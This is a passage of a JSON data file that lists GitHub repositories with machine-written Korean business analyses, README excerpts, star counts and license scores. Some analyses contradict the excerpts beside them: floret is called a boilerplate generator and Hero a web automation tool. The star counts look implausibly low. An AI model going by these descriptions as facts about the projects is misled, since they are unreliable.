실습 자료로 판매하는 구독형 강의 서비스\n2. **기업 내부 교육 도구**: ","readme_excerpt":"# Python GUIs Examples\n\n**This repository contains 100s of GUI examples written in Python**. From complete working applications to reusable widgets snippets, these examples can\nbe _freely_ re-used, re-mixed and tweaked to build your own Python GUI applications.\n\n## Contributions Welcome\n\nThis repo is an _open_ collaborative collection of UI demonstrations, tutorials and examples for Python. **New additions are welcome**, just _fork_ this repository, add your example code file(s) in the [library]/[type]/[folder-name] and open a pull request.\n\n## Browse this repo\n\nExamples are available for\n[PyQt6](https://github.com/pythonguis/pythonguis-examples/tree/main/pyqt6) and\n[PySide6](https://github.com/pythonguis/pythonguis-examples/tree/main/pyside6),\n(many examples) along with\n[DearPyGui](https://github.com/pythonguis/pythonguis-examples/tree/main/dearpygui),\n[Flet](https://github.com/pythonguis/pythonguis-examples/tree/main/flet),\n[Kivy](https://github.com/pythonguis/pythonguis-examples/tre","composite_score":0.27,"license_safety_tag":"safe"},{"name":"TheAlgorithms/Javascript","github_url":"https://github.com/TheAlgorithms/Javascript","stars":15,"language":"JavaScript","license":"GPL-3.0","abandonment_months":3,"description":"# TheAlgorithms/Javascript 상용화 분석\n\n## 왜 보물인가\n프로그래밍 학습자부터 개발자까지 다양한 수준의 사람들이 수학 문제를 푸는 방법을 배우고 실무에 적용할 수 있는 교육용 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 SaaS**: 입문자용 알고리즘 학습 플랫폼으로 월 구독제 제공 (예: 코드 강의 + ","readme_excerpt":"# The Algorithms - JavaScript\n\n<!-- Front Matter -->\n\nJavaScript Repository of TheAlgorithms, which implements various algorithms and data structures in JavaScript.\n\n<div align=\"center\">\n\n[![JavaScript Banner][banner]](DIRECTORY.md)\n\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/TheAlgorithms/JavaScript)\n[![Checks][checks]][actions]\n[![codecov](https://codecov.io/gh/TheAlgorithms/JavaScript/graph/badge.svg?token=8VeZwL31KZ)](https://codecov.io/gh/TheAlgorithms/JavaScript)\n[![Contributions Welcome][welcome]](CONTRIBUTING.md)\n[![standard.js][standard-logo]][standard-js]\n[![Discord chat][chat]][discord-server]\n\n</div>\n\n---\n\n<!-- Disclaimer -->\n\n<h4 align=\"center\">\n  These implementations are for demonstrative purposes only. Dedicated implementations of these algorithms and data\n  structures are much better for performance and security reasons. We also do not provide any guarantee for api stability.\n</h","composite_score":0.2694,"license_safety_tag":"restricted"},{"name":"electron/electron-apps","github_url":"https://github.com/electron/electron-apps","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# Electron Apps 저장소 분석\n\n## 왜 보물인가\n윈도우, 맥, 리눅스 모두에서 작동하는 데스크톱 애플리케이션들의 모음으로, 크로스플랫폼 앱 개발의 좋은 사례 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데스크톱 버전이 필요한 협업 도구나 설계 소프트웨어의 개발 가이드로 활용\n2. **내부 업무 도구**: 회사 직원들이","readme_excerpt":"# electron-apps [![CI](https://github.com/electron/apps/actions/workflows/test.yml/badge.svg)](https://github.com/electron/apps/actions/workflows/test.yml)\n\nA collection of apps built on Electron.\n[electronjs.org/apps](http://electronjs.org/apps).\n\n## Adding your app\n\nIf you have an Electron application you'd like to see added, please read the\n[contributing](contributing.md) doc.\n\n## How it Works\n\nSee [contributing.md#how-it-works](contributing.md#how-it-works)\n\n## License\n\nMIT\n","composite_score":0.2691,"license_safety_tag":"safe"},{"name":"Microsoft/WSL","github_url":"https://github.com/Microsoft/WSL","stars":8,"language":"C++","license":"MIT","abandonment_months":0,"description":"# Microsoft/WSL 상용화 분석\n\n## 왜 보물인가\nWindows 사용자도 Linux 환경에서 프로그래밍할 수 있게 해주는 Microsoft 공식 도구로, 전 세계 수백만 개발자의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 초보자도 Windows에서 Linux 명령어를 배울 수 있는 온라인 코딩 교육 플랫폼\n","readme_excerpt":"# Welcome to the Windows Subsystem for Linux (WSL) repository\n\n<p align=\"center\">\n  <img src=\"./Images/Square44x44Logo.targetsize-256.png\" alt=\"WSL logo\"/>\n</p>\n\n[Learn more about WSL](https://aka.ms/wsldocs) | [Downloads & Release notes](https://github.com/microsoft/WSL/releases) | [Contributing to WSL](./CONTRIBUTING.md)\n\n## About\n\nWindows Subsystem for Linux (WSL) is a powerful way for you to run your Linux command-line tools, utilities and applications, all unmodified and directly on Windows without the overhead of a traditional virtual machine or dual boot setup.\n\nYou can install WSL right away by running this command inside of your Windows command line:\n\n```powershell\nwsl --install\n```\n\nYou can learn more about [best practices for setup](https://learn.microsoft.com/windows/wsl/setup/environment), [overviews of WSL](https://learn.microsoft.com/windows/wsl/about) and more at our [WSL documentation page](https://learn.microsoft.com/windows/wsl/).\n\n## Related repositories\n\nWSL also h","composite_score":0.269,"license_safety_tag":"safe"},{"name":"ngryman/reading-time","github_url":"https://github.com/ngryman/reading-time","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":13,"description":"# Reading-Time 저장소 분석\n\n## 왜 보물인가\n웹사이트나 블로그에 글을 올릴 때 \"이 글을 읽는데 몇 분이 걸릴까?\"를 자동으로 계산해주는 작은 하지만 매우 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그 플랫폼 SaaS**: 미디엄, 해시노드 같은 블로깅 서비스에서 각 포스트 옆에 \"약 5분 읽음\"이라는 예상 시간을 표시\n2","readme_excerpt":"# reading-time\n\n[![NPM](http://img.shields.io/npm/v/reading-time.svg)](https://www.npmjs.org/package/reading-time) [![Build Status](http://img.shields.io/travis/ngryman/reading-time.svg)](https://travis-ci.org/ngryman/reading-time)\n\n<br>\n\n[Medium]'s like reading time estimation.\n\n`reading-time` helps you estimate how long an article will take to read.\nIt works perfectly with plain text, but also with `markdown` or `html`.\n\nNote that it's focused on performance and simplicity, so the number of words it will extract from other formats than plain text can vary a little. But this is an estimation right?\n\n[medium]: https://medium.com\n\n## Installation\n\n```sh\nnpm install reading-time --production\n```\n\n## Usage\n\n### Classic\n\n```javascript\n// In Node.js\nconst readingTime = require('reading-time');\n// In the browser\nconst readingTime = require('reading-time/lib/reading-time');\n\nconst stats = readingTime(text);\n// ->\n// stats: {\n//   minutes: 1,\n//   time: 60000,\n//   words: {total: 200}\n// }\ncon","composite_score":0.2686,"license_safety_tag":"safe"},{"name":"Byron/learning-rust-with-gitoxide","github_url":"https://github.com/Byron/learning-rust-with-gitoxide","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":13,"description":"# Byron/learning-rust-with-gitoxide 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 따라 배울 수 있는 깃(Git) 버전 관리 시스템의 교육용 학습 자료로, 복잡한 기술을 단계별로 이해하게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 깃 기술을 배우려는 개발자들을 위한 온라인 강좌 플랫폼\n2. **내부 업무 ","readme_excerpt":"The repository worked in during episodes of [LRG](https://youtube.com/playlist?list=PLMHbQxe1e9Mk5kOHrm9v20-umkE2ck_gE) for learning Rust with [gitoxide].\n\n[gitoxide]: https://github.com/Byron/gitoxide\n\n### Episodes - Commit\n\n* [01 - The essence of Rust](https://youtu.be/LDlBTbO8oQ4) - 405fe8b75689ae0b7a003c90121cc70876e03c84\n* [02 - Fancy borrows and zero sized structs](https://youtu.be/ETNW0QlXHYQ) - 4b7dcf5beb3cd98945042e9d0b86c0589519e806\n\nThe above list is currently incomplete.\n\n### Authors\n\nLRG and the files in this repository are by [Sebastian Thiel](https://github.com/Byron) and [Sidney Douw](https://github.com/SidneyDouw).\n\n### License\n\nThe files in this repository are licensed under either of\n\n* Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n* MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n","composite_score":0.2681,"license_safety_tag":"safe"},{"name":"dreamingechoes/awesome-mental-health","github_url":"https://github.com/dreamingechoes/awesome-mental-health","stars":8,"language":"HTML","license":"CC0-1.0","abandonment_months":13,"description":"# awesome-mental-health 상용화 분석\n\n## 왜 보물인가\n정신건강 정보를 체계적으로 모아놓은 리스트로, 마음 건강을 챙기려는 사람들이 필요한 자료를 한곳에서 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **정신건강 플랫폼 SaaS**: 우울증·불안증 자가진단, 명상 가이드, 전문가 상담 연결 서비스로 구독료 수익화\n2. **기업 ","readme_excerpt":"\n<p align=\"center\"><img src=\"./media/logo.png\"></p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/sindresorhus/awesome\"><img alt=\"awesome\" src=\"https://awesome.re/badge.svg\"/></a>\n  <img alt=\"PRs Welcome\" src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\"/>\n</p>\n\n---\n\n## About\n\n✨ A curated collection of outstanding articles, tools, and resources focused on mental health in the software industry. ✨\n\n**Mental health** is a foundational aspect of our overall well-being. It encompasses emotional, psychological, and social stability, and affects how we think, feel, act, relate to others, and make choices. In the context of the tech industry—where long hours, high pressure, and remote or isolated work environments are common—supporting mental health is a personal priority and a collective responsibility.\n\nThis list gathers resources designed to raise awareness, promote self-care, reduce stigma, and help individuals and organizations navigate mental health challenges. From man","composite_score":0.2673,"license_safety_tag":"unknown"},{"name":"DanielHe4rt/basement-lms","github_url":"https://github.com/DanielHe4rt/basement-lms","stars":19,"language":"PHP","license":"unknown","abandonment_months":13,"description":"# DanielHe4rt/basement-lms 분석\n\n## 왜 보물인가\n학교나 학원이 학생들을 관리하고 강의를 올릴 수 있는 맞춤형 플랫폼을 직접 만들 수 있어서, 비싼 외국 서비스에 의존하지 않아도 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 강의 플랫폼 SaaS**: 프리랜서 강사나 소규모 학원이 월 구독료를 내고 자신의 강의 사이트를 운영\n","readme_excerpt":"<p align=\"center\"><a href=\"https://laravel.com\" target=\"_blank\"><img src=\"https://raw.githubusercontent.com/laravel/art/master/logo-lockup/5%20SVG/2%20CMYK/1%20Full%20Color/laravel-logolockup-cmyk-red.svg\" width=\"400\"></a></p>\n\n\n## Basement LMS\n\nA criação da LMS vai dar ênfase em uma facilidade maior para que outros desenvolvedores Laravel entendam como é a modelagem de tudo.\n\n\nEssa aplicação ainda está em desenvolvimento, caso você queira integrar ao time, mande um e-mail para os mantenedores!\n\n```\ndanielhe4rt: hey@danielheart.dev\n```\n\n### Projeto\n1. [] Base do Projeto\n   1. Tecnologias:\n      1. [x] Bootstrap 4/5\n      2. [x] Azure Stream \n      3. [x] Docker \n      4. [] Larastan\n2. [] Autenticação\n    * [x] Métodos base: Sessão\n    * [] Métodos custom: Google, Github e Twitch\n3. [] Cursos\n    1. [] Modelagem Admin\n       1. [X] Pagina de Criação de cursos\n       2. [X] Pagina de Criação de módulos\n          1. [] Ordenação de módulos\n       3. [X] Pagina de Criação de Lições\n      ","composite_score":0.2672,"license_safety_tag":"unknown"},{"name":"reruin/sharelist","github_url":"https://github.com/reruin/sharelist","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":12,"description":"# sharelist 프로젝트 분석\n\n## 왜 보물인가\n여러 개의 파일 저장소(클라우드 드라이브)를 한곳에서 통합 관리할 수 있는 도구로, 파일 정리가 복잡한 개인과 팀의 시간을 크게 절약해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 기업의 구글 드라이브, 드롭박스, OneDrive 등을 한 대시보드에서 관리하는 통합 파일 클라우드 ","readme_excerpt":"# ShareList\n\n[![Build Status](https://github.com/reruin/sharelist/actions/workflows/ci.yml/badge.svg)](https://github.com/reruin/sharelist/actions/workflows/ci.yml)\n\nShareList 是一个易用的网盘工具，支持快速挂载 GoogleDrive、OneDrive ，可通过插件扩展功能。  \n新版正在开发中，欢迎[提交反馈](https://github.com/reruin/sharelist/issues/new/choose)。[查看旧版](https://github.com/reruin/sharelist/tree/0.1)。\n\n## 文档\n[查看文档](https://reruin.github.io/sharelist/docs/#/zh-cn/)\n\n## 进度\n- [x] 核心库支持 \n- [x] 新主题 \n- [x] 自定义插件开发\n- [x] webdav\n- [x] 跨盘转移\n- [x] 秒传\n\n## 支持情况\n|       | 下载 | 上传 | 列目录 | 创建目录 | 删除 | 重命名 | 远程移动 | hash | 秒传\n| ----        | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- |\nOneDrive   |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | sha1 | x |\nGoogleDrive   |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | md5 | x |\nLocal File    |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | md5/sha1 | x |\nAliyunDrive   |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | sha1 | ✓ |\nCaiYun   |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | md5 | ✓ |\nCTCloud   |  ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | md5 | ✓ |\nBaidu Netdisk   |  ✓ | x | ✓ ","composite_score":0.2671,"license_safety_tag":"safe"},{"name":"lkzhao/Hero","github_url":"https://github.com/lkzhao/Hero","stars":17,"language":"Swift","license":"mit","abandonment_months":16,"description":"# Hero 저장소 분석\n\n## 왜 보물인가\n깃허브에서 17개의 별을 받은 신규 프로젝트로, 최근까지 활발히 유지보수되고 있어 발전 가능성이 있는 오픈소스 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 자동화 도구로 패키징하여 월간 구독료 모델로 판매\n- **내부 업무 도구**: 중소기업의 반복적인 작업 자동화 솔루션으로 커스","readme_excerpt":"<img src=\"https://cdn.rawgit.com/lkzhao/Hero/427d5f2/Resources/Hero.svg\" width=\"388\"/>\n\n**Hero** is a library for building iOS view controller transitions. It provides a declarative layer on top of the UIKit's cumbersome transition APIs—making custom transitions an easy task for developers.\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio)\n[![codecov](https://codecov.io/gh/HeroTransitions/Hero/branch/develop/graph/badge.svg)](https://codecov.io/gh/HeroTransitions/Hero)\n[![Version](https://img.shields.io/cocoapods/v/Hero.svg?style=flat)](http://cocoapods.org/pods/Hero)\n[![License](https://img.shields.io/cocoapods/l/Hero.svg?style=flat)](https://github.com/lkzhao/Hero/blob/master/LICENSE?raw=true)\n![Xcode 10.0+](https://img.shields.io/badge/Xcode-10.0%2B-blue.svg)\n![iOS 10.0+","composite_score":0.267,"license_safety_tag":"safe"},{"name":"junegunn/goyo.vim","github_url":"https://github.com/junegunn/goyo.vim","stars":6,"language":"Vim Script","license":"MIT","abandonment_months":5,"description":"# junegunn/goyo.vim 분석 보고서\n\n## 왜 보물인가\n글쓰기나 코딩에 집중해야 할 때 화면의 모든 방해 요소를 없애주는 \"집중 모드\" 플러그인으로, 전 세계 수천 명의 개발자와 작가가 매일 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 글쓰기 SaaS**\n- 미디엄(Medium), 노션(Notion) 같은 웹 기반 글쓰기 도","readme_excerpt":"goyo.vim ([고요](http://en.wiktionary.org/wiki/고요하다))\n=========================================================\n\nDistraction-free writing in Vim.\n\n![](https://raw.github.com/junegunn/i/master/goyo.png)\n\n(Color scheme: [seoul256](https://github.com/junegunn/seoul256.vim))\n\nBest served with [limelight.vim](https://github.com/junegunn/limelight.vim).\n\nInstallation\n------------\n\nUse your favorite plugin manager.\n\n- [vim-plug](https://github.com/junegunn/vim-plug)\n  1. Add `Plug 'junegunn/goyo.vim'` to .vimrc\n  2. Run `:PlugInstall`\n\nUsage\n-----\n\n- `:Goyo`\n    - Toggle Goyo\n- `:Goyo [dimension]`\n    - Turn on or resize Goyo\n- `:Goyo!`\n    - Turn Goyo off\n\nThe window can be resized with the usual `[count]<CTRL-W>` + `>`, `<`, `+`,\n`-` keys, and `<CTRL-W>` + `=` will resize it back to the initial size.\n\n### Dimension expression\n\nThe expected format of a dimension expression is\n`[WIDTH][XOFFSET][x[HEIGHT][YOFFSET]]`. `XOFFSET` and `YOFFSET` should be\nprefixed by `+` or `-`. Each component can be","composite_score":0.2657,"license_safety_tag":"safe"},{"name":"explosion/floret","github_url":"https://github.com/explosion/floret","stars":12,"language":"C++","license":"MIT","abandonment_months":13,"description":"# explosion/floret 상용화 분석\n\n## 왜 보물인가\n개발자들이 반복적으로 작성하는 보일러플레이트 코드를 자동으로 생성해주어 개발 속도를 크게 단축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 개발 회사들이 고객 프로젝트를 더 빠르게 구축하기 위한 내부 도구로 판매\n2. **내부 업무 도구**: 대형 I","readme_excerpt":"<a href=\"https://explosion.ai\"><img src=\"https://explosion.ai/assets/img/logo.svg\" width=\"125\" height=\"125\" align=\"right\" /></a>\n\n# floret: fastText + Bloom embeddings for compact, full-coverage vectors with spaCy\n\nfloret is an extended version of [fastText](https://fasttext.cc) that can\nproduce word representations for any word from a compact vector table. It\ncombines:\n\n- fastText's subwords to provide embeddings for any word\n- Bloom embeddings (\"hashing trick\") for a compact vector table\n\nTo learn more about floret, check out our [blog post on floret vectors](https://explosion.ai/blog/floret-vectors).\n\nFor a hands-on introduction, experiment with English vectors in this example\nnotebook: [`intro_to_floret`][intro_to_floret] [![Open in\nColab][colab]][intro_to_floret_colab]\n\n[colab]: https://gistcdn.githack.com/ines/dcf354aa71a7665ae19871d7fd14a4e0/raw/461fc1f61a7bc5860f943cd4b6bcfabb8c8906e7/colab-badge.svg\n[intro_to_floret]: examples/01_intro_to_floret.ipynb\n[intro_to_floret_colab]: ","composite_score":0.2653,"license_safety_tag":"safe"},{"name":"k88hudson/git-flight-rules","github_url":"https://github.com/k88hudson/git-flight-rules","stars":7,"language":"","license":"CC-BY-SA-4.0","abandonment_months":7,"description":"# git-flight-rules 분석 보고서\n\n## 왜 보물인가\nGit(버전 관리 도구)을 사용하다가 실수했을 때 문제를 해결하는 방법을 정리한 실용적인 가이드로, 개발자들이 자주 찾는 솔루션을 체계적으로 모아놓았습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발팀 온보딩 SaaS**: 신입 개발자가 Git 실수 상황을 빠르게 검색하고 해결할 수 있는 인","readme_excerpt":"# Flight rules for Git\n\n🌍\n*[English](README.md) ∙ [Español](README_es.md)  ∙  [Русский](README_ru.md) ∙ [繁體中文](README_zh-TW.md) ∙ [简体中文](README_zh-CN.md) ∙ [한국어](README_kr.md)  ∙  [Tiếng Việt](README_vi.md) ∙ [Français](README_fr.md) ∙ [日本語](README_ja.md)*\n\n#### What are \"flight rules\"?\n\nA guide for astronauts (now, programmers using Git) about what to do when things go wrong.\n\n>  *Flight Rules* are the hard-earned body of knowledge recorded in manuals that list, step-by-step, what to do if X occurs, and why. Essentially, they are extremely detailed, scenario-specific standard operating procedures. [...]\n\n> NASA has been capturing our missteps, disasters and solutions since the early 1960s, when Mercury-era ground teams first started gathering \"lessons learned\" into a compendium that now lists thousands of problematic situations, from engine failure to busted hatch handles to computer glitches, and their solutions.\n\n&mdash; Chris Hadfield, *An Astronaut's Guide to Life on Earth*.\n\n####","composite_score":0.265,"license_safety_tag":"unknown"},{"name":"gregberge/loadable-components","github_url":"https://github.com/gregberge/loadable-components","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":12,"description":"# loadable-components 분석\n\n## 왜 보물인가\n웹사이트가 느려지는 것을 방지하기 위해 필요한 부분만 미리 불러오는 기술로, 사용자 경험을 크게 개선할 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드가 많은 분석 도구에서 각 페이지를 필요할 때만 로딩하여 초기 속도 개선\n2. **내부 업무 도구*","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/gregberge/loadable-components/master/resources/loadable-components.png\" alt=\"loadable-components\" title=\"loadable-components\" width=\"300\">\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">React code splitting made easy. Reduce your bundle size without stress ✂️✨.</p>\n\n[![License](https://img.shields.io/npm/l/@loadable/component.svg)](https://github.com/gregberge/loadable-components/blob/master/LICENSE)\n[![npm package](https://img.shields.io/npm/v/@loadable/component/latest.svg)](https://www.npmjs.com/package/@loadable/component)\n[![npm downloads](https://img.shields.io/npm/dm/@loadable/component.svg)](https://www.npmjs.com/package/@loadable/component)\n[![Build Status](https://img.shields.io/travis/gregberge/loadable-components.svg)](https://travis-ci.org/gregberge/loadable-components)\n![Code style](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)\n[![Dependencies](https://img.shields.io/david/gregberge/loada","composite_score":0.2649,"license_safety_tag":"safe"},{"name":"abs-lang/abs","github_url":"https://github.com/abs-lang/abs","stars":14,"language":"Go","license":"MIT","abandonment_months":13,"description":"# abs-lang/abs 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 쉽게 배울 수 있는 간단한 프로그래밍 언어로, 개발 교육이나 자동화 작업을 민주화할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 코딩 교육 플랫폼**\n비전공자를 위한 온라인 프로그래밍 강좌 제공 서비스로, 복잡한 언어 대신 abs를 교육용 첫 언","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://www.abs-lang.org/\">\n    <img alt=\"abs language logo\" src=\"https://github.com/abs-lang/abs/blob/master/bin/ABS.png?raw=true\" width=\"310\">\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/abs-lang/abs\">\n    <img alt=\"GitHub Workflow Status (branch)\" src=\"https://img.shields.io/github/actions/workflow/status/abs-lang/abs/tests.yml?branch=master\">\n  </a>\n  <a href=\"https://github.com/abs-lang/abs\">\n    <img alt=\"License\" src=\"https://img.shields.io/github/license/abs-lang/abs.svg\">\n  </a>\n  <a href=\"https://github.com/abs-lang/abs\">\n    <img alt=\"Version\" src=\"https://img.shields.io/github/release-pre/abs-lang/abs.svg\">\n  </a>\n  <img alt=\"undefined\" src=\"https://img.shields.io/github/release-date/abs-lang/abs.svg?style=flat\">\n  <img alt=\"undefined\" src=\"https://img.shields.io/github/downloads/abs-lang/abs/total.svg?style=flat\">\n  <br />\n  <img alt=\"undefined\" src=\"https://img.shields.io/badge/platform-linux | macosx | windows-red.svg\">\n  <","composite_score":0.2648,"license_safety_tag":"safe"},{"name":"jesseduffield/OK","github_url":"https://github.com/jesseduffield/OK","stars":8,"language":"Go","license":"MIT","abandonment_months":13,"description":"# jesseduffield/OK 프로젝트 분석\n\n## 왜 보물인가\n별도의 복잡한 설정 없이 바로 사용할 수 있는 실용적인 개발 도구로, 작은 규모지만 핵심 기능에 충실한 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 개발팀이 반복적인 작업을 자동화하기 위한 사내용 소프트웨어로 판매\n2. **API 판매**: 다른 기업의 개발 도","readme_excerpt":"# _OK?_\n\n_Try it out on the [playground](https://www.okquestionmark.org/)_\n\n_Watch the [Making-of video](https://www.youtube.com/watch?v=PLGpUsSL0FI&ab_channel=JesseDuffield)_\n\n<p align=\"center\">\n  <img src=\"assets/quentyn_vectorised.png\" width=\"500px\"/>\n  <p align=\"center\"><i>OK?'s mascot: Quentyn Questionmark.</i></p>\n</p>\n\n## Programming Is Simple Again\n\n_OK?_ is a modern, dynamically typed programming language with a vision for the future.\n_OK?_'s mission is to do away with the needless complexity of today's programming languages and let you focus on what matters: writing code that makes a difference.\n\n### Contents\n\n- [Conditionals](#conditionals)\n- [Readable Switches](#readable-switches)\n- [Nulls Are Not OK](#nulls-are-not-ok)\n- [Error Handling](#error-handling)\n- [Readable Logical Operators](#readable-logical-operators)\n- [One Comparison Operator](#one-comparison-operator)\n- [Dead-simple Operator Precedence](#dead-simple-operator-precedence)\n- [Death To Classes](#death-to-classes","composite_score":0.2647,"license_safety_tag":"safe"},{"name":"evildmp/diataxis-documentation-framework","github_url":"https://github.com/evildmp/diataxis-documentation-framework","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":13,"description":"# evildmp/diataxis-documentation-framework 분석\n\n## 왜 보물인가\n복잡한 제품 설명서를 누구나 쉽게 이해할 수 있도록 체계적으로 정리해주는 문서 작성 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신입 직원이나 고객이 소프트웨어 사용법을 빠르게 배울 수 있는 온라인 매뉴얼 제공\n2. **내부 업무","readme_excerpt":"The documentation system\n========================\n\nA comprehensive and practical system that can help maintainers of product documentation.\n\nPublished at https://diataxis.fr\n\nAuthor: Daniele Procida\n\nLicense: `CC-BY-SA 4.0 <https://creativecommons.org/licenses/by-sa/4.0/>`_\n","composite_score":0.2646,"license_safety_tag":"unknown"},{"name":"rstacruz/cheatsheets","github_url":"https://github.com/rstacruz/cheatsheets","stars":6,"language":"SCSS","license":"unknown","abandonment_months":6,"description":"# rstacruz/cheatsheets 분석\n\n## 왜 보물인가\n프로그래밍을 배우는 사람들이 자주 찾는 핵심 개념을 한눈에 보는 참고서 모음으로, 학습 자료로서의 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 학습 플랫폼**: 코딩 초보자용 참고 자료로 제공하는 교육 서비스\n2. **회사 내부 위키**: 직원들이 빠르게 개념을 찾아볼","readme_excerpt":"<h1 align='center'>Devhints</h1>\n\n<blockquote align='center'>\nTL;DR for developer documentation - a ridiculous collection of cheatsheets\n</blockquote>\n\n<br>\n\n<p align='center'>\n<a href='https://devhints.io/'><img src='.github/images/screenshot.png' width=600></a>\n<br>\n✨ <b><a href='https://devhints.io/'>devhints.io</a></b> ✨\n</p>\n\n<br>\n\n---\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for developer notes.\n\n[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/rstacruz/cheatsheets)\n\n<h2 align='center'>Similar projects</h1>\n\n- [Command Line Interface Pages](https://github.com/command-line-interface-pages)\n- [tldr-pages](https://github.com/tldr-pages/tldr)\n- [Cheat](https://github.com/cheat/cheat)\n- [Eg](https://github.com/srsudar/eg)\n","composite_score":0.2626,"license_safety_tag":"unknown"},{"name":"forthespada/InterviewGuide","github_url":"https://github.com/forthespada/InterviewGuide","stars":9,"language":"","license":"Apache-2.0","abandonment_months":10,"description":"# InterviewGuide 저장소 분석\n\n## 왜 보물인가\n취업을 준비하는 수백만 명이 면접 질문과 답변 자료를 찾고 있는데, 이 저장소는 그 모든 것을 한곳에 정리해놓은 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **면접 준비 SaaS**: 질문별 답변 제시, 자신의 답변 녹음 및 피드백 기능을 추가하여 월 구독 서비스로 운영\n2. **기","readme_excerpt":"<p id=\"阿秀的学习笔记\"></p>\r\n\r\n<h1 align=\"center\">InterviewGuide | 📔 阿秀的学习笔记</h1>\r\n\r\n> 你好，我是阿秀，一名坚持终身学习的互联网从业者，目前在字节跳动抖音部门担任全栈研发工程师，主后端、兼前端，->[📚︎关于我](docs/notes/01-guide/web-guide-reading.md)。\r\n>\r\n> 本仓库是是阿秀从校园->职场多年计算机自学过程的记录以及学弟学妹们秋招总结文章的汇总，也许你曾经了解过甚至研读过一本PDF，它可能叫做《逆袭进大厂》或者《阿秀的学习笔记》或者《阿秀的求职笔记》，都是本仓库内容的部分摘录。\r\n\r\n👉 推荐 [在线阅读](https://interviewguide.cn) (Github 访问速度比较慢可能会导致部分图片无法刷新出来)\r\n\r\n👉 如果你是计算机小白、迷茫找不到方向、或者跟阿秀一样出身很差（大专、三本、二本等）、不甘平凡想要再努力一把、缺少学习动力等，不妨阅读[阿秀的故事](docs/notes/01-guide/web-guide-reading.md#二、自学经历)或者加入[阿秀的学习圈](https://interviewguide.cn/notes/05-xiustar/01-xiustar_reading_guide/01-introduce.html#%E9%98%BF%E7%A7%80%E7%BB%84%E5%BB%BA%E4%BA%86%E4%B8%80%E4%B8%AA%E6%A0%A1%E6%8B%9B%E5%AD%A6%E4%B9%A0%E5%9C%88%E5%AD%90)，我记录了自己从普通双非学校一名默默无名的学生到顺利成长为一名互联网一线大厂的程序员的成长过程以及在互联网职场的学习成长经历，相信这些内容能够帮助你成长一名合格的互联网技术从业者。\r\n\r\n👉 该学习笔记适用于**互联网校招求职应届生**以及**毕业三年内的互联网社招同学~** 作者：[阿秀](doc/notes/08-other/02-question.md#_1、网站内容适用人群)\r\n\r\n🔥🔥🔥 **1000**本计算机经典书籍免费下载：[CS-Books](https://github.com/forthespada/CS-Books)\r\n\r\n👉 关","composite_score":0.2625,"license_safety_tag":"safe"},{"name":"wulkano/kap","github_url":"https://github.com/wulkano/kap","stars":6,"language":"TypeScript","license":"mit","abandonment_months":19,"description":"# Kap 저장소 분석\n\n## 왜 보물인가\n화면 녹화와 GIF 변환을 간단하게 해주는 도구로, 마케팅 자료나 튜토리얼 영상을 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 소프트웨어 사용법을 쉽게 배울 수 있도록 자동으로 튜토리얼 영상을 만들어주는 서비스\n2. **내부 업무 도구**: 팀원들이 업무 방법을 화면","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://getkap.co/static/favicon/kap.svg\" height=\"64\">\n  <h3 